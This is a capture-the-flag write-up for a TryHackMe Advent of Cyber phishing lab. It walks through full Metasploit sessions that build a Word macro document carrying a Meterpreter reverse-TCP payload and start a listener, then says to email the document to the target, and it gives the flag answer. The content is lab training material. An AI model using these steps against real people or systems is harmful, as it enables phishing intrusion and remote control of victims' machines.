Sharon Jebitok
The Advent of Cyber: Day 10: Phishing - He had a brain full of macros, and had shells in his soul. (TryHackMe)

The Advent of Cyber: Day 10: Phishing - He had a brain full of macros, and had shells in his soul. (TryHackMe)

J3bitok's photo
J3bitok
·

5 min read

In this article, we’ll cover Phishing - He had a brain full of macros and had shells in his soul writeup as the Day 2 challenge of the Advent of Cyber event challenge. It was interesting to navigate the platform and filter different events and logs based on timestamps, IP addresses, and the events, i.e., authentication, process, etc. We’re still at Wareville for SOC-mas!

First, read through the introduction to understanding concepts like Phishing and Macros as they’ll be fundamental here:

Phishing Attacks

Security is as strong as the weakest link. Many would argue that humans are the weakest link in the security chain. Is it easier to exploit a patched system behind a firewall or to convince a user to open an “important” document? Hence, “human hacking” is usually the easiest to accomplish and falls under social engineering.

Phishing is a play on the word fishing; however, the attacker is not after seafood. Phishing works by sending a “bait” to a usually large group of target users. Furthermore, the attacker often craft their messages with a sense of urgency, prompting target users to take immediate action without thinking critically, increasing the chances of success. The purpose is to steal personal information or install malware, usually by convincing the target user to fill out a form, open a file, or click a link.

One might get an email out of nowhere claiming that they are being charged a hefty sum and that they should check the details in the attached file or URL. The attacker just needs to have their target users open the malicious file or view the malicious link. This can trigger specific actions that would give the attack control over your system.

Macros

The needs of MS Office users can be vastly different, and there is no way that a default installation would cater to all of these needs. In particular, some users find themselves repeating the same tasks, such as formatting and inserting text or performing calculations. Consider the example of number-to-words conversion where a number such as “1337” needs to be expressed as “one thousand three hundred thirty-seven”. It would take hours to finish if you have hundreds of numbers to convert. Hence, there is a need for an automated solution to save time and reduce manual effort.

In computing, a macro refers to a set of programmed instructions designed to automate repetitive tasks. MS Word, among other MS Office products, supports adding macros to documents. In many cases, these macros can be a tremendous time-saving feature. However, in cyber security, these automated programs can be hijacked for malicious purposes.

You’ll start the machine and open the terminal, we’ll be using Metasploit Framework a lot. We’ll use the command msfconsole to launch it. In this first of the challenge a Microsoft word document will be created within our directories so we’ve to be keen

root@AttackBox:~# msfconsole 
[...]
Metasploit Documentation: https://docs.metasploit.com/

msf6 > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 > use exploit/multi/fileformat/office_word_macro
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/fileformat/office_word_macro) > set LHOST CONNECTION_IP
LHOST => CONNECTION_IP
msf6 exploit(multi/fileformat/office_word_macro) > set LPORT 8888
LPORT => 8888
msf6 exploit(multi/fileformat/office_word_macro) > show options

Module options (exploit/multi/fileformat/office_word_macro):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CUSTOMTEMPLATE                   no        A docx file that will be used as a template to build the exploit
   FILENAME        msf.docm         yes       The Office document macro file (docm)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     CONNECTION_IP    yes       The listen address (an interface may be specified)
   LPORT     8888             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word on Windows


View the full module info with the info, or info -d command.

msf6 exploit(multi/fileformat/office_word_macro) > exploit

[*] Using template: /opt/metasploit-framework/embedded/framework/data/exploits/office_word_macro/template.docx
[*] Injecting payload in document comments
[*] Injecting macro and other required files in document
[*] Finalizing docm: msf.docm
[+] msf.docm stored at /root/.msf4/local/msf.docm
msf6 exploit(multi/fileformat/office_word_macro) > exit

If you open a new tab on the terminal and check /root/.msf4/local/msf.docm you’ll find the doc. Copy the doc into a new file within the root folder (this is optional)
cd ./.msf4/local cp msf.docm /root/invoice.docm

there’s a part of the walkthrough where you just read through since we can’t access the Windows machine. The important part for us to find the flag is the second section where we’re using the Metasploit framework again but this time we won’t exit the exploit before we check the Windows directory. 

root@AttackBox:~# msfconsole 
[...]
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST CONNECTION_IP
LHOST => CONNECTION_IP
msf6 exploit(multi/handler) > set LPORT 8888
LPORT => 8888
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     CONNECTION_IP    yes       The listen address (an interface may be specified)
   LPORT     8888             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on CONNECTION_IP:8888

Finding the flag will be dependent on sending an email with the Microsoft Word document as an attachment. We’re given a URL to open the email together with the necessary credentials i.e. email & password together with the recipient’s email.

Once you’ve sent the email, the exploit will open up the Meterpreter which will allow us to access the Windows directory and we’ll be able to find the flag.txt file and cat flag.txt to check its contents.

  1. What is the flag value inside the flag.txt file that’s located on the Administrator’s desktop? THM{PHISHING_CHRISTMAS}

  2. If you enjoyed this task, feel free to check out the Phishing module.

Thank you for reading through this article. You can leave a comment with your thoughts: areas to improve or other suggestions and questions if any. Till the next one, stay secure!

Did you find this article valuable?

Support Sharon Jebitok by becoming a sponsor. Any amount is appreciated!

AdventOfCyber2024tryhackmeWrite Upmacrosmetasploit frameworkphishing